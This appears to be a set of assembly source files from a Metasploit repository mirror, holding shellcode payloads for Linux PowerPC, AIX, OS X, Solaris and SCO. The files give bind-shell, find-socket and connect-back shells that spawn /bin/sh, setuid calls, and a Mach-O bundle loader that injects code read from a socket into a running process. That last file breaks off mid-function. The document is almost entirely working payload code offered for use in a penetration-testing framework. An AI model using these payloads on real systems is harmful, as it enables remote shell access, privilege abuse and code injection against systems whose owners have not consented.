*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 60 bytes
fndsockcode:
xorl %eax,%eax
pushl %eax
movl %esp,%edi
pushl $0x10
pushl %esp
pushl %edi
pushl %eax
pushl %eax
0:
popl %eax
popl %eax
incl %eax
pushl %eax
pushl %eax
pushl $0x1f
popl %eax
int $0x80
cmpw $0xd204,0x02(%edi)
jne 0b
pushl %eax
1:
pushl $0x5a
popl %eax
int $0x80
decl -0x10(%edi)
jns 1b
shellcode:
# xorl %eax,%eax
# pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
OpenWireSec/metasploit | 1,703 | external/source/unixasm/osx-x86-bndsockcode.s | /*
* osx-x86-bndsockcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 74 bytes
bndsockcode:
xorl %eax,%eax
pushl %eax
pushl $0xd20402ff
movl %esp,%edi
pushl %eax
pushl $0x01
pushl $0x02
pushl $0x10
movb $0x61,%al
int $0x80
pushl %edi
pushl %eax
pushl %eax
pushl $0x68
popl %eax
int $0x80
movl %eax,-0x14(%edi)
movb $0x6a,%al
int $0x80
movb $0x1e,%al
int $0x80
pushl %eax
pushl %eax
0:
pushl $0x5a
popl %eax
int $0x80
decl -0x1c(%edi)
jns 0b
shellcode:
# xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
OpenWireSec/metasploit | 1,616 | external/source/unixasm/osx-x86-shellcode.s | /*
* osx-x86-shellcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
setresuidcode:
xorl %eax,%eax
pushl %eax
pushl %eax
pushl %eax
pushl %eax
movw $0x0137,%ax
int $0x80
setreuidcode:
xorl %eax,%eax
pushl %eax
pushl %eax
pushl %eax
movb $0x7e,%al
int $0x80
setuidcode:
xorl %eax,%eax
pushl %eax
pushl %eax
movb $0x17,%al
int $0x80
exitcode:
xorl %eax,%eax
pushl %eax
movb $0x01,%al
int $0x80
# 24 bytes
shellcode:
xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
OpenWireSec/metasploit | 2,253 | external/source/unixasm/sol-x86-cntsockcode.s | /*
* sol-x86-cntsockcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Socket versions. Used by the socket library when calling _so_socket().
*/
#define SOV_STREAM 0 /* Not a socket - just a stream */
#define SOV_DEFAULT 1 /* Select based on so_default_version */
#define SOV_SOCKSTREAM 2 /* Socket plus streams operations */
#define SOV_SOCKBSD 3 /* Socket with no streams operations */
#define SOV_XPG4_2 4 /* Xnet socket */
.global _start
_start:
# 91 bytes
syscallcode:
pushl $0x3cffd8ff
pushl $0x65
movl %esp,%esi
notl 0x04(%esi)
notb (%esi)
cntsockcode:
pushl $0x0101017f
pushw $0xd204
pushw $0x02
movl %esp,%edi
pushl $0x02 /* SOV_SOCKSTREAM */
xorl %eax,%eax
pushl %eax
pushl %eax
pushl $0x02
pushl $0x02 /* Used as SOV_SOCKSTREAM when calling connect() */
movb $0xe6,%al
call *%esi
pushl $0x10
pushl %edi
pushl %eax
xorl %eax,%eax
movb $0xeb,%al
call *%esi
popl %ebx
pushl %ebx
pushl $0x09
pushl %ebx
0:
pushl $0x3e
popl %eax
call *%esi
decl -0x20(%edi)
jns 0b
shellcode:
# xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
pushl %eax
pushl %ecx
pushl %ebx
movb $0x3b,%al
call *%esi
|
OpenWireSec/metasploit | 1,826 | external/source/unixasm/lin-power-shellcode.S | /*
* lin-power-shellcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
.globl main
main:
#ifdef ALL
setresuidcode:
lil %r31,__CAL
xor %r5,%r5,%r5
xor %r4,%r4,%r4
xor %r3,%r3,%r3
cal %r0,__NC_setresuid(%r31)
.long 0x44ffff02
setreuidcode:
lil %r31,__CAL
xor %r4,%r4,%r4
xor %r3,%r3,%r3
cal %r0,__NC_setreuid(%r31)
.long 0x44ffff02
setuidcode:
lil %r31,__CAL
xor %r3,%r3,%r3
cal %r0,__NC_setuid(%r31)
.long 0x44ffff02
#endif
shellcode:
lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)
stb %r5,-511+43(%r30)
stu %r5,-4(%r1)
stu %r3,-4(%r1)
mr %r4,%r1
cal %r0,__NC_execve(%r31)
.long 0x44ffff02
.asciz "/bin/sh"
#ifdef ALL
exitcode:
lil %r31,__CAL
xor %r3,%r3,%r3
cal %r0,__NC_exit(%r31)
.long 0x44ffff02
#endif
|
OpenWireSec/metasploit | 2,624 | external/source/unixasm/lin-power-bndsockcode.S | /*
* lin-power-bndsockcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
.globl main
main:
bndsockcode:
xor %r31,%r31,%r31
lil %r29,__CAL
# socket
cal %r28,-511+1(%r29)
cal %r27,-511+2(%r29)
stu %r31,-4(%r1)
stu %r28,-4(%r1)
stu %r27,-4(%r1)
mr %r4,%r1
cal %r3,__NC_socket(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
mr %r26,%r3
# bind
cal %r25,-511+16(%r29)
/*
* The following GPRs result in zeros when used with liu instruction.
* %r24, %r16, %r8, %r0
*
*/
liu %r23,0xff02
oril %r23,%r23,0x04d2
stu %r31,-4(%r1)
stu %r23,-4(%r1)
mr %r22,%r1
stu %r25,-4(%r1)
stu %r22,-4(%r1)
stu %r26,-4(%r1)
mr %r4,%r1
cal %r3,__NC_bind(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
# listen
stu %r31,-4(%r1)
stu %r31,-4(%r1)
stu %r26,-4(%r1)
mr %r4,%r1
cal %r3,__NC_listen(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
# accept
mr %r4,%r1
cal %r3,__NC_accept(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
mr %r21,%r3
0:
# dup2
mr %r4,%r27
mr %r3,%r21
cal %r0,__NC_dup2(%r29)
.long 0x44ffff02
ai. %r27,%r27,-1
bge 0b
shellcode:
# lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)
stb %r5,-511+43(%r30)
stu %r5,-4(%r1)
stu %r3,-4(%r1)
mr %r4,%r1
# cal %r0,__NC_execve(%r31)
cal %r0,__NC_execve(%r29)
.long 0x44ffff02
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 1,307 | external/source/unixasm/sco-x86-shellcode.s | /*
* sco-x86-shellcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
syscallcode:
pushl $0x3cfff8ff
pushl $0x65
movl %esp,%esi
notl 0x04(%esi)
notb (%esi)
setuidcode:
xorl %eax,%eax
pushl %eax
movb $0x17,%al
call *%esi
shellcode:
xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %eax
pushl %ebx
movb $0x3b,%al
call *%esi
|
OpenWireSec/metasploit | 3,042 | external/source/unixasm/aix-power-bndsockcode.S | /*
* aix-power-bndsockcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Supported AIX versions:
*
* -DAIX614 AIX Version 6.1.4
* -DAIX613 AIX Version 6.1.3
* -DAIX612 AIX Version 6.1.2
* -DAIX611 AIX Version 6.1.1
* -DAIX5310 AIX Version 5.3.10
* -DAIX539 AIX Version 5.3.9
* -DAIX538 AIX Version 5.3.8
* -DAIX537 AIX Version 5.3.7
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
syscallcode:
xor. %r31,%r31,%r31
bnel syscallcode
mflr %r30
cal %r30,511(%r30)
cal %r30,-511+28(%r30)
mtctr %r30
bctr
crorc %cr6,%cr6,%cr6
.long 0x44ffff02
cal %r30,-8(%r30)
bndsockcode:
lil %r29,__CAL
# socket
xor %r5,%r5,%r5
cal %r4,-__CAL+1(%r29)
cal %r3,-__CAL+2(%r29)
cal %r2,__NC_socket(%r29)
mtctr %r30
bctrl
mr %r28,%r3
# bind
cal %r5,-__CAL+16(%r29)
liu %r27,0xff02
oril %r27,%r27,0x04d2
stu %r31,-4(%r1)
stu %r27,-4(%r1)
mr %r4,%r1
cal %r2,__NC_bind(%r29)
mtctr %r30
bctrl
# listen
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_listen(%r29)
mtctr %r30
bctrl
# accept
xor %r5,%r5,%r5
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_accept(%r29)
mtctr %r30
bctrl
mr %r26,%r3
# close
cal %r25,-__CAL+2(%r29)
0:
mr %r3,%r25
cal %r2,__NC_close(%r29)
mtctr %r30
bctrl
# kfcntl
mr %r5,%r25
xor %r4,%r4,%r4
mr %r3,%r26
cal %r2,__NC_kfcntl(%r29)
mtctr %r30
bctrl
ai. %r25,%r25,-1
bge 0b
shellcode:
# lil %r29,__CAL
xor. %r5,%r5,%r5
bnel shellcode
# mflr %r30
# cal %r30,511(%r30)
# cal %r3,-511+40(%r30)
# stb %r5,-511+48(%r30)
mflr %r24
cal %r24,511(%r24)
cal %r3,-511+40(%r24)
stb %r5,-511+48(%r24)
stu %r5,-4(%r1)
stu %r3,-4(%r1)
mr %r4,%r1
cal %r2,__NC_execve(%r29)
# crorc %cr6,%cr6,%cr6
# .long 0x44ffff02
mtctr %r30
bctrl
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 1,094 | external/source/unixasm/osx-ppc-shellcode.s | /*
* osx-ppc-shellcode.s
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 00 bytes
shellcode:
xor. r5,r5,r5
bnel shellcode
mflr r31
addi r3,r31,32
stwu r5,-4(r1)
stwu r3,-4(r1)
lr r1,r4
li r0,59
sc
.asciiz "/bin/sh"
|
OpenWireSec/metasploit | 2,117 | external/source/unixasm/lin-power-fndsockcode64.S | /*
* lin-power-fndsockcode64.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
.globl main
main:
fndsockcode64:
xor %r31,%r31,%r31
lil %r29,__CAL
# getpeername
stu %r31,-4(%r1)
mr %r28,%r1
cal %r27,-511+16(%r29)
stu %r27,-4(%r1)
mr %r26,%r1
stdu %r26,-8(%r1)
stdu %r28,-8(%r1)
stdu %r31,-8(%r1)
0:
cal %r31,511(%r31)
cal %r31,-511+1(%r31)
cal %r1,511(%r1)
cal %r1,-511+8(%r1)
stdu %r31,-8(%r1)
mr %r4,%r1
cal %r3,__NC_getpeername(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
cal %r25,511(%r28)
lhz %r25,-511+2(%r25)
cmpli 0,%r25,1234
bne 0b
cal %r24,-511+2(%r29)
1:
# dup2
mr %r4,%r24
mr %r3,%r31
cal %r0,__NC_dup2(%r29)
.long 0x44ffff02
ai. %r24,%r24,-1
bge 1b
shellcode64:
# lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode64
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)
stb %r5,-511+43(%r30)
stdu %r5,-8(%r1)
stdu %r3,-8(%r1)
mr %r4,%r1
# cal %r0,__NC_execve(%r31)
cal %r0,__NC_execve(%r29)
.long 0x44ffff02
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 2,632 | external/source/unixasm/lin-power-bndsockcode64.S | /*
* lin-power-bndsockcode64.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
.globl main
main:
bndsockcode64:
xor %r31,%r31,%r31
lil %r29,__CAL
# socket
cal %r28,-511+1(%r29)
cal %r27,-511+2(%r29)
stdu %r31,-8(%r1)
stdu %r28,-8(%r1)
stdu %r27,-8(%r1)
mr %r4,%r1
cal %r3,__NC_socket(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
mr %r26,%r3
# bind
cal %r25,-511+16(%r29)
/*
* The following GPRs result in zeros when used with liu instruction.
* %r24, %r16, %r8, %r0
*
*/
liu %r23,0xff02
oril %r23,%r23,0x04d2
stu %r31,-4(%r1)
stu %r23,-4(%r1)
mr %r22,%r1
stdu %r25,-8(%r1)
stdu %r22,-8(%r1)
stdu %r26,-8(%r1)
mr %r4,%r1
cal %r3,__NC_bind(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
# listen
stdu %r31,-8(%r1)
stdu %r31,-8(%r1)
stdu %r26,-8(%r1)
mr %r4,%r1
cal %r3,__NC_listen(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
# accept
mr %r4,%r1
cal %r3,__NC_accept(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
mr %r21,%r3
0:
# dup2
mr %r4,%r27
mr %r3,%r21
cal %r0,__NC_dup2(%r29)
.long 0x44ffff02
ai. %r27,%r27,-1
bge 0b
shellcode64:
# lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode64
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)
stb %r5,-511+43(%r30)
stdu %r5,-8(%r1)
stdu %r3,-8(%r1)
mr %r4,%r1
# cal %r0,__NC_execve(%r31)
cal %r0,__NC_execve(%r29)
.long 0x44ffff02
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 2,779 | external/source/unixasm/aix-power-fndsockcode.S | /*
* aix-power-fndsockcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Supported AIX versions:
*
* -DAIX614 AIX Version 6.1.4
* -DAIX613 AIX Version 6.1.3
* -DAIX612 AIX Version 6.1.2
* -DAIX611 AIX Version 6.1.1
* -DAIX5310 AIX Version 5.3.10
* -DAIX539 AIX Version 5.3.9
* -DAIX538 AIX Version 5.3.8
* -DAIX537 AIX Version 5.3.7
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
syscallcode:
xor. %r31,%r31,%r31
bnel syscallcode
mflr %r30
cal %r30,511(%r30)
cal %r30,-511+28(%r30)
mtctr %r30
bctr
crorc %cr6,%cr6,%cr6
.long 0x44ffff02
cal %r30,-8(%r30)
fndsockcode:
lil %r29,__CAL
# getpeername
stu %r31,-4(%r1)
mr %r28,%r1
cal %r27,-__CAL+44(%r29)
stu %r27,-4(%r1)
mr %r27,%r1
0:
cal %r31,511(%r31)
cal %r31,-511+1(%r31)
mr %r5,%r27
mr %r4,%r28
mr %r3,%r31
cal %r2,__NC_getpeername(%r29)
mtctr %r30
bctrl
cal %r26,511(%r28)
lhz %r26,-511+2(%r26)
cmpli 0,%r26,1234
bne 0b
# close
cal %r25,-__CAL+2(%r29)
1:
mr %r3,%r25
cal %r2,__NC_close(%r29)
mtctr %r30
bctrl
# kfcntl
mr %r5,%r25
xor %r4,%r4,%r4
mr %r3,%r31
cal %r2,__NC_kfcntl(%r29)
mtctr %r30
bctrl
ai. %r25,%r25,-1
bge 1b
shellcode:
# lil %r29,__CAL
xor. %r5,%r5,%r5
bnel shellcode
# mflr %r30
# cal %r30,511(%r30)
# cal %r3,-511+40(%r30)
# stb %r5,-511+48(%r30)
mflr %r24
cal %r24,511(%r24)
cal %r3,-511+40(%r24)
stb %r5,-511+48(%r24)
stu %r5,-4(%r1)
stu %r3,-4(%r1)
mr %r4,%r1
cal %r2,__NC_execve(%r29)
# crorc %cr6,%cr6,%cr6
# .long 0x44ffff02
mtctr %r30
bctrl
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 1,611 | external/source/unixasm/osx-x86-fndsockcode.s | /*
* osx-x86-fndsockcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 61 bytes
fndsockcode:
xorl %eax,%eax
pushl %eax
movl %esp,%edi
pushl $0x10
pushl %esp
pushl %edi
pushl %eax
pushl %eax
0:
popl %eax
popl %eax
incl %eax
pushl %eax
pushl %eax
pushl $0x1f
popl %eax
int $0x80
cmpw $0xd204,0x02(%edi)
jne 0b
pushl %eax
1:
pushl $0x5a
popl %eax
int $0x80
decl -0x10(%edi)
jns 1b
shellcode:
# xorl %eax,%eax
# pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
OpenWireSec/metasploit | 6,685 | external/source/osx/x86/include/_inject_bundle.s | ;;;
;;; Skip straight to inject_bundle when we assemble this as bin file
;;;
jmp _inject_bundle
;;; --------------------------------------------------------------------
;;; Constants
;;; --------------------------------------------------------------------
%define MAP_ANON 0x1000
%define MAP_PRIVATE 0x0002
%define PROT_READ 0x01
%define PROT_WRITE 0x02
%define NSLINKMODULE_OPTION_BINDNOW 0x1
%define NSLINKMODULE_OPTION_PRIVATE 0x2
%define NSLINKMODULE_OPTION_RETURN_ON_ERROR 0x4
;;; --------------------------------------------------------------------
;;; ror13_hash(string symbol_name)
;;;
;;; Compute the 32-bit "ror13" hash for a given symbol name. The hash
;;; value is left in the variable hash
;;; --------------------------------------------------------------------
%macro ror13_hash 1
%assign hash 0
%assign c 0
%strlen len %1
%assign i 1
%rep len
%substr c %1 i
%assign hash ((((hash >> 13) | (hash << 19)) + c) & 0xFFFFFFFF)
%assign i i + 1
%endrep
%endmacro
;;; --------------------------------------------------------------------
;;; dyld_resolve(uint32_t hash)
;;;
;;; Lookup the address of an exported symbol within dyld by "ror13" hash.
;;;
;;; Arguments:
;;; hash - 32-bit "ror13" hash of symbol name
;;; --------------------------------------------------------------------
_dyld_resolve:
mov eax, [esp+4]
push eax
push 0x8fe00000
call _macho_resolve
ret 4
;;; --------------------------------------------------------------------
;;; macho_resolve(void* base, uint32_t hash)
;;;
;;; Lookup the address of an exported symbol within the given Mach-O
;;; image by "ror13" hash value.
;;;
;;; Arguments:
;;; base - base address of Mach-O image
;;; hash - 32-bit "ror13" hash of symbol name
;;; --------------------------------------------------------------------
_macho_resolve:
push ebp
mov ebp, esp
sub esp, byte 12
push ebx
push esi
push edi
mov ebx, [ebp+8] ; mach-o image base address
mov eax, [ebx+16] ; mach_header->ncmds
mov [ebp-4], eax ; ncmds
add bl, 28 ; Advance ebx to first load command
.loadcmd:
;; Load command loop
xor eax, eax
cmp dword [ebp-4], eax
je .return
inc eax
cmp [ebx], eax
je .segment
inc eax
cmp [ebx], eax
je .symtab
.next_loadcmd:
;; Advance to the next load command
dec dword [ebp-4]
add ebx, [ebx+4]
jmp .loadcmd
.segment:
;; Look for "__TEXT" segment
cmp [ebx+10], dword 'TEXT'
je .text
;; Look for "__LINKEDIT" segment
cmp [ebx+10], dword 'LINK'
je .linkedit
jmp .next_loadcmd
.text:
mov eax, [ebx+24]
mov [ebp-8], eax ; save image preferred load address
jmp .next_loadcmd
.linkedit:
;; We have found the __LINKEDIT segment
mov eax, [ebx+24] ; segcmd->vmaddr
sub eax, [ebp-8] ; image preferred load address
add eax, [ebp+8] ; actual image load address
sub eax, [ebx+32] ; segcmd->fileoff
mov [ebp-12], eax ; save linkedit segment base
jmp .next_loadcmd
.symtab:
;; Examine LC_SYMTAB load command
mov ecx, [ebx+12] ; ecx = symtab->nsyms
.symbol:
xor eax, eax
cmp ecx, eax
je .return
dec ecx
imul edx, ecx, byte 12 ; edx = index into symbol table
add edx, [ebx+8] ; edx += symtab->symoff
add edx, [ebp-12] ; adjust symoff relative to linkedit
mov esi, [edx] ; esi = index into string table
add esi, [ebx+16] ; esi += symtab->stroff
add esi, [ebp-12] ; adjust stroff relative to linkedit
;; hash = (hash >> 13) | ((hash & 0x1fff) << 19) + c
xor edi, edi
cld
.hash:
xor eax, eax
lodsb
cmp al, ah
je .compare
ror edi, 13
add edi, eax
jmp .hash
.compare:
cmp edi, [ebp+12]
jne .symbol
mov eax, [edx+8] ; return symbols[ecx].n_value
sub eax, [ebp-8] ; adjust to actual load address
add eax, [ebp+8]
.return:
pop edi
pop esi
pop ebx
leave
ret 8
;;; --------------------------------------------------------------------
;;; inject_bundle(int filedes)
;;;
;;; Read a Mach-O bundle from the given file descriptor, load and link
;;; it into the currently running process.
;;;
;;; Arguments:
;;; filedes (edi) - file descriptor to read() bundle from
;;; --------------------------------------------------------------------
_inject_bundle:
push ebp
mov ebp, esp
sub esp, byte 12
mov esi, edi ; arg0: filedes
.read_size:
;; Read a 4-byte size of bundle to read
xor eax, eax
mov al, 4
push eax ; nbyte
lea edi, [ebp-4]
push edi ; buf
push esi ; s
push eax
dec eax
int 0x80
jb .read_error
cmp eax, ecx ; A zero-read signals termination
je .read_error
mov ecx, [ebp-4]
xor eax, eax
cmp ecx, eax
je .read_error ; A zero value signals termination
jmp .mmap
.read_error:
jmp .error
.mmap:
;; mmap memory
xor eax, eax
push eax
push -1
push (MAP_ANON | MAP_PRIVATE)
push (PROT_READ | PROT_WRITE)
push ecx ; size
push eax
push eax ; spacer
mov al, 197
int 0x80
jb .error
mov edi, eax ; memory buffer
mov [ebp-8], edi
;; read bundle from file descriptor into mmap'd buffer
.read_bundle:
xor eax, eax
push ecx ; nbyte
push edi ; buf
push esi ; filedes
push eax ; spacer
mov al, 3
int 0x80
jb .error
add edi, eax
sub ecx, eax
jnz .read_bundle
mov edi, [ebp-8] ; load original memory buffer
;; Now that we are calling library methods, we need to make sure
;; that esp is 16-byte aligned at the the point of the call
;; instruction. So we align the stack here and then just be
;; careful to keep it aligned as we call library functions.
sub esp, byte 16
and esp, 0xfffffff0
;; load bundle from mmap'd buffer
push byte 0 ; maintain alignment
lea eax, [ebp-8]
push eax ; &objectFileImage
push dword [ebp+12] ; size
push edi ; addr
ror13_hash "_NSCreateObjectFileImageFromMemory"
push dword hash
call _dyld_resolve
call eax
cmp al, 1
jne .error
;; link bundle from object file image
xor eax, eax
push eax
mov al, (NSLINKMODULE_OPTION_RETURN_ON_ERROR | NSLINKMODULE_OPTION_BINDNOW)
push eax
push esp ; ""
push dword [ebp-8]
ror13_hash "_NSLinkModule"
push dword hash
call _dyld_resolve
